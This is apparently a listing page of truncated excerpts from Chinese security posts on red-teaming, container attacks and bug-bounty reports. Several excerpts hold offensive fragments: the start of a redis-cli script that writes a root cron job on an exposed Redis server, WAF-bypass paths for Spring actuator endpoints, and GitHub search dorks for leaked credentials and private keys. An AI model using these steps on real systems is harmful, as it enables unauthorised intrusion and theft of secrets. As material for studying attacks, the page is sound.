Linux操作系统写入计划任务的操作为例，编写exp.sh： redis-cli -h $1 -p $2 config set dir /var/spool/cron/ redis-cli -h $1 -p $2 config set dbfilename root redis-cli -h $1 -p $2 set 1...

容器环境红队手法总结 http://mp.weixin.qq.com/s/WaRECg79Nxx08iekakrlMA 如何使用 Kubesploit 和 KubiScan 提高云原生安全性 http://www.conjur.org/blog/tutorial-kubernetes-vulnerability-...

原文链接: http://www.o2oxy.cn/3632.html 介绍： 首先呢，先了解下Konga是什么东东(有点多余，知道有漏洞就行了!)，了解konga之前呢，先了解下Kong：Kong是一款基于OpenResty（Nginx + Lua模块...

之前看了挺多大佬写相关的文章，奈何我没太理解，所以想着自己搭建一个试试理解下。 搞完之后发现其实也就是一个nginx反向代理+配置文件改动下的事情。不知道搞得对不对，希望XD们看了指正下。 ...

漏洞报告 Visual Studio advisories/2021_vscode_ipynb_xss_arbitrary_file_read.md at master · justinsteven/advisories Mail.ru [#968402 http://kiwi.youdrive.today/] Information disclo...

有时开发稍不注意会将带有配置信息的源码传至GitHub，这时可以利用一些语法辅助我们找到敏感信息，github dorks： filename:.npmrc _auth filename:.dockercfg auth extension:pem private exte...

护网的时候闲的没事干，我这条咸鱼也开始挖某财大气粗的src 懒得找什么子域名，小程序app，先看主站，xray被动一开，就报有cors漏洞，这种漏洞想要有危害，就是要找一个敏感接口并且此接口正好...

WAF Bypass小技巧 /actuator/env ---> 403 Forbidden /actuator;/env ---> 200 OK //actuator/env ---> 200 OK #火线Zone Tips# 本文迁移自知识星球“火线Zone” 文字来源于- 火线 Z...

0x01 前言 文章写完了，绕过了360杀毒，绕过了火绒，绕过了电脑管家，总结了些简单的姿势，确是没骗过win10的防病毒，剩下的这部分是从Typora的历史记录里找的，，，已经没有想法再来一遍了，，...

挖洞技巧 如何成为智能合约审计师 http://cmichel.io/how-to-become-a-smart-contract-auditor/ 域接管的5 种方法 http://redhuntlabs.com/blog/5-ways-to-exploit-a-domain-takeover-vulnerabi...

漏洞报告 【U.S. Dept Of Defense】路径遍历 http://hackerone.com/reports/1212746 【U.S. Dept Of Defense】基于post请求的反射xss http://hackerone.com/reports/998935 【U.S. Dept Of Defe...

漏洞报告 【Gitlab 1,800 USD】[Java] CWE-502: Unsafe deserialization with three JSON frameworks http://hackerone.com/reports/1368720 【Gitlab 1,800 USD】[Python]: CWE-117 Log Inject...

漏洞报告 微软和 GitHub OAuth 实施漏洞导致重定向攻击 http://www.proofpoint.com/us/blog/cloud-security/microsoft-and-github-oauth-implementation-vulnerabilities-lead-redirection 挖洞...

漏洞报告 【Shopify 900刀】Shopify.com Web Cache Deception漏洞导致个人信息和CSRF令牌泄露 http://hackerone.com/reports/1087382 【Shopify 800刀】商店删除或未经身份验证出售 http://hack...

在挖（捡）src的过程中，遇到一个视频制作教学类的站点，尝试一波信息收集后没什么太大收获，就开始尝试对网站的功能处进行测试，用自己的账号登录后挨个查看网站内容的时候，发现一个模块无权...

漏洞报告 配置错误导致垂直越权 500$ http://hackerone.com/reports/1088159 Twitter XSS 5040$ http://hackerone.com/reports/1369674 Twitter信息泄露 5040$ http://hackerone.com/reports/14...